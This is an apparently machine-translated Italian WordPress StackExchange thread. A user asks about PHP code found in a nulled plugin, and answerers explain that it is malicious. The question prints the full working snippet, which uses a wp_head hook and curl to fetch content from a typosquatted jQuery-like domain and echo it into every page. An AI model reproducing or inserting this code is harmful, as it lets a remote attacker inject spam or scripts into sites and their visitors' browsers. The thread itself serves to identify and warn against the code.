L'ho trovato in un plugin. Che cosa fa? è pericoloso?

17

L'ho trovato in un plugin. Che cosa fa? è pericoloso?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
plugins  wp-admin  security  curl 
Sofia Rose
fonte
5
Quale plugin è quello?
Daniel
Hai ricevuto il plug-in dal sito WP ufficiale?
Quel ragazzo brasiliano il
1
Questo era in un plug-in che uno dei miei clienti voleva che eseguissi sulla mia installazione di rete. Il plugin voleva eseguirlo in wp-admin. Dopo aver letto questo gli ho chiesto da dove provenisse. È un plugin annullato da un torrent. La risposta breve fu erm NO xXx
Sofia Rose

Risposte:

16

Carica un blocco di markup contenente spam (ho pensato di pubblicare un po 'della fonte ma non voglio pubblicizzare il contenuto in alcun modo) da un dominio che è uno stretto errore di ortografia del dominio http://jquery.com/- - utilizzato da jQuery , una libreria Javascript affidabile e popolare e una che WordPress include nel Core. Penso che l'idea sia quella di caricare quella libreria, mentre in realtà carica qualcosa di molto diverso.

Ed è in altri modi che sembra che stia caricando jQuery. Notare il nome della variabile $jquery.

Potrebbe anche tentare di caricare script dannosi. Non ho controllato. Mi sarebbe sicuramente chiamare pericoloso tanto più che il contenuto di quella pagina può cambiare in qualsiasi momento il dominio controller voglia.

Nella migliore delle ipotesi danneggerà il tuo sito mentre i motori di ricerca guardano in basso sui siti che diffondono spam.

Non usarlo. Non fa nulla di benefico per te o per chiunque altro sul web tranne le persone che gestiscono il sito. Se l'hai trovato su un sito affidabile, segnalalo a loro.

s_ha_dum
fonte
7

Sì, è un codice pericoloso, caricare contenuti da un sito di spam.

Non hai nominato il plug-in, ma se hai trovato questo codice dopo che è stato installato sul tuo sito web, è possibile che il codice del plug-in non provenga dallo sviluppatore in questo modo, ma sia stato hackerato dopo l'installazione. In questo caso, potresti trovare il codice dannoso su un numero maggiore di siti web oltre a questo plugin.

Controlla il codice del plug-in scaricato ovunque tu abbia ottenuto il plug-in originale e vedi se questo codice dannoso era presente in origine. In caso contrario, il tuo sito è stato violato. Se lo ritieni necessario, leggi questo articolo dal Codex .

Ben Miller - Ripristina Monica
fonte
3
Questo era in un plug-in che uno dei miei clienti voleva che eseguissi sulla mia installazione di rete. Il plugin voleva eseguirlo in wp-admin. Dopo aver letto questo gli ho chiesto da dove provenisse. È un plugin annullato da un torrent. La risposta breve fu erm NO xXx
Sofia Rose
Utilizzando il nostro sito, riconosci di aver letto e compreso le nostre Informativa sui cookie e Informativa sulla privacy.
Licensed under cc by-sa 3.0 with attribution required.